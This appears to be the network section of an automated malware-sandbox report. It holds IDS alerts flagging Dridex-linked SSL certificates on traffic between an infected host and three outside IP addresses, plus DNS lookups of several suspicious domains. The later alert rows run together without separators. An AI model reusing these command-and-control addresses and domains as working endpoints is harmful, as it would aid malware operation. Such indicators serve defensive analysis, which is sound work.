01/21/21-16:04:29.150739 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49188 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:30.556130 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49190 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:31.872034 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49193 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:31.872034 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49193 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:31.898933 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49192 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:33.298173 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49194 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:34.701529 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49196 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:35.844382 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49197 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:35.844382 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49197 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:39.180341 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49198 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:40.621421 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49200 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:40.785185 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49201 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:40.785185 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49201 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:43.371398 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49202 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:44.842753 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49204 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:45.524251 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49205 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:45.524251 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49205 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:46.921906 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49206 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:48.312954 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49207 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:50.163233 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49209 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:50.163233 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49209 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:51.614740 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49211 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:51.985596 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49212 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:51.985596 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49212 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:53.014734 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49213 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:53.908263 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49214 | 194.225.58.214 | 192.168.2.22
01/21/21-16:04:55.342083 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49215 | 211.110.44.63 | 192.168.2.22
01/21/21-16:04:58.578879 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49218 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:58.578879 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49218 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:59.792435 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49219 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:59.792435 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49219 | 198.57.200.100 | 192.168.2.22
01/21/21-16:04:59.962903 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49220 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:01.242080 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49222 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:01.339167 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49221 | 211.110.44.63 | 192.168.2.22
01/21/21-16:05:02.950427 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49223 | 211.110.44.63 | 192.168.2.22
01/21/21-16:05:05.102027 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49226 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:05.102027 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49226 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:06.362416 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49227 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:06.362416 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49227 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:06.848613 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49228 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:07.794094 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49229 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:08.272927 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49230 | 211.110.44.63 | 192.168.2.22
01/21/21-16:05:09.236162 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49231 | 211.110.44.63 | 192.168.2.22
01/21/21-16:05:11.803955 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49234 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:11.803955 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49234 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:13.080928 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49235 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:13.163277 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49237 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:13.267179 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49236 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:13.267179 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49236 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:14.514401 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49238 | 211.110.44.63 | 192.168.2.22
01/21/21-16:05:14.613041 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49239 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:15.360047 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49240 | 211.110.44.63 | 192.168.2.22
01/21/21-16:05:15.965007 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49241 | 211.110.44.63 | 192.168.2.22
01/21/21-16:05:17.760588 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49244 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:17.760588 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49244 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:18.964732 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49246 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:18.964732 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49246 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:19.109059 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49247 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:19.347931 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49248 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:19.347931 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49248 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:20.323663 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49250 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:20.449693 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49249 | 211.110.44.63 | 192.168.2.22
01/21/21-16:05:20.694333 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49251 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:21.687198 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49252 | 211.110.44.63 | 192.168.2.22
01/21/21-16:05:22.041230 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49253 | 211.110.44.63 | 192.168.2.22
01/21/21-16:05:23.802663 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49255 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:23.802663 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49255 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:25.123593 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49259 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:25.127942 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49258 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:25.127942 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49258 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:25.432173 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49260 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:25.432173 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49260 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:26.172896 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49261 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:26.172896 | TCP | 2022535 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 3786 | 49261 | 198.57.200.100 | 192.168.2.22
01/21/21-16:05:26.469088 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49263 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:26.476599 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49262 | 211.110.44.63 | 192.168.2.22
01/21/21-16:05:27.255584 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49264 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:27.515480 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49265 | 194.225.58.214 | 192.168.2.22
01/21/21-16:05:27.829986 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 5353 | 49266 | 211.110.44.63 | 192.168.2.22
                                                                                                01/21/21-16:05:28.857854TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349268211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:29.538797TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349269211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:29.555104TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349270194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:29.794028TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649271198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:29.794028TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649271198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:30.894885TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349273211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:31.183587TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349275194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:31.925991TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649276198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:31.925991TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649276198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:32.399770TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649278198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:32.399770TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649278198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:32.547137TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349277211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:32.907417TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349279211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:33.273708TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349281194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:33.720570TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349282194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:34.266517TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649283198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:34.266517TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649283198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:34.654997TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349284211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:35.059826TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349286211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:35.610055TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349288194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:35.905508TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649289198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:35.905508TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649289198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:36.981764TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349290211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:37.133510TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649292198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:37.133510TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649292198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:37.258397TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349294194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:38.110702TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649295198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:38.110702TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649295198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:38.452090TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649297198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:38.452090TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649297198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:38.472694TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349298194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:38.604331TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349296211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:39.452082TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349300194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:39.785106TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349302194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:39.826455TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349301211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:40.300104TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649303198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:40.300104TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649303198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:40.820554TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349304211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:41.144735TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349306211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:41.637602TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349307194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:41.999790TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649308198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:41.999790TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649308198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:43.014369TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349311211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:43.339614TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649313198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:43.339614TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649313198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:43.339690TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349314194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:44.113688TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649315198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:44.113688TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649315198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:44.417558TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649316198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:44.417558TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649316198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:44.681731TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349318194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:44.705140TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349317211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:45.476337TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349319194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:45.738256TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349320194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:46.072429TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349321211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:46.222007TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349322211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:47.579711TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649326198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:47.579711TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649326198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:47.633977TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349325211.110.44.63192.168.2.22

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 21, 2021 16:03:16.526415110 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 21, 2021 16:03:16.711199999 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 21, 2021 16:03:17.592540979 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 21, 2021 16:03:17.640499115 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 21, 2021 16:03:17.651228905 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 21, 2021 16:03:17.699147940 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 21, 2021 16:03:18.240075111 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jan 21, 2021 16:03:18.288335085 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jan 21, 2021 16:03:18.293981075 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jan 21, 2021 16:03:18.341964960 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jan 21, 2021 16:03:26.437694073 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jan 21, 2021 16:03:27.438571930 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jan 21, 2021 16:03:27.500000000 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jan 21, 2021 16:03:27.533200026 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jan 21, 2021 16:03:37.413358927 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jan 21, 2021 16:03:37.951539993 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Jan 21, 2021 16:04:25.462573051 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Jan 21, 2021 16:04:25.519269943 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Jan 21, 2021 16:04:31.024112940 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Jan 21, 2021 16:04:31.227071047 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 21, 2021 16:03:27.533313036 CET | 192.168.2.22 | 8.8.8.8 | d016 | Port unreachable | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 21, 2021 16:03:16.526415110 CET | 192.168.2.22 | 8.8.8.8 | 0xccae | Standard query (0) | qsf.surfescape.net | A (IP address) | IN (0x0001)
Jan 21, 2021 16:03:26.437694073 CET | 192.168.2.22 | 8.8.8.8 | 0x9ffe | Standard query (0) | stellarum.com.br | A (IP address) | IN (0x0001)
Jan 21, 2021 16:03:27.438571930 CET | 192.168.2.22 | 8.8.8.8 | 0x9ffe | Standard query (0) | stellarum.com.br | A (IP address) | IN (0x0001)
Jan 21, 2021 16:03:37.413358927 CET | 192.168.2.22 | 8.8.8.8 | 0xd237 | Standard query (0) | reliablelifts.co.in | A (IP address) | IN (0x0001)
Jan 21, 2021 16:04:25.462573051 CET | 192.168.2.22 | 8.8.8.8 | 0xfe26 | Standard query (0) | shopandmartonline.com | A (IP address) | IN (0x0001)
Jan 21, 2021 16:04:31.024112940 CET | 192.168.2.22 | 8.8.8.8 | 0x2cc0 | Standard query (0) | creditoenusa.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 21, 2021 16:03:16.711199999 CET | 8.8.8.8 | 192.168.2.22 | 0xccae | No error (0) | qsf.surfescape.net | - | 64.37.52.172 | A (IP address) | IN (0x0001)
Jan 21, 2021 16:03:27.500000000 CET | 8.8.8.8 | 192.168.2.22 | 0x9ffe | No error (0) | stellarum.com.br | - | 191.252.144.65 | A (IP address) | IN (0x0001)
Jan 21, 2021 16:03:27.533200026 CET | 8.8.8.8 | 192.168.2.22 | 0x9ffe | No error (0) | stellarum.com.br | - | 191.252.144.65 | A (IP address) | IN (0x0001)
Jan 21, 2021 16:03:37.951539993 CET | 8.8.8.8 | 192.168.2.22 | 0xd237 | No error (0) | reliablelifts.co.in | - | 103.83.81.27 | A (IP address) | IN (0x0001)
Jan 21, 2021 16:04:25.519269943 CET | 8.8.8.8 | 192.168.2.22 | 0xfe26 | No error (0) | shopandmartonline.com | - | 198.136.54.91 | A (IP address) | IN (0x0001)
